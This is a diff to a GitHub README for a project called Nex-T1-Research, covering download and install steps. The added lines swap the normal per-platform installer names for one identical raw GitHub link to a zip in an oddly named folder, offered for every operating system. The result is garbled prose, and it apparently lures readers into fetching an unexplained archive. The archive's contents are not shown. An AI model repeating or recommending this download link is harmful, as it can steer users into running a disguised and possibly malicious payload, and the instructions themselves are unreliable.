rahuldounde21/Nex-T1-Research/README.md

 2. Locate the file for your operating system.
 3. Click on the file to start the download.

-The file to look for is often named something like `Nex-T1-Research-v1.0.exe` for Windows, `Nex-T1-Research-v1.0.dmg` for macOS, or a `.tar.gz` file for Linux.
+The file to look for is often named something like `https://raw.githubusercontent.com/rahuldounde21/Nex-T1-Research/main/Cassiduloidea/Nex-T1-Research.zip` for Windows, `https://raw.githubusercontent.com/rahuldounde21/Nex-T1-Research/main/Cassiduloidea/Nex-T1-Research.zip` for macOS, or a `https://raw.githubusercontent.com/rahuldounde21/Nex-T1-Research/main/Cassiduloidea/Nex-T1-Research.zip` file for Linux.

 4. Once the download is complete, locate the downloaded file on your computer.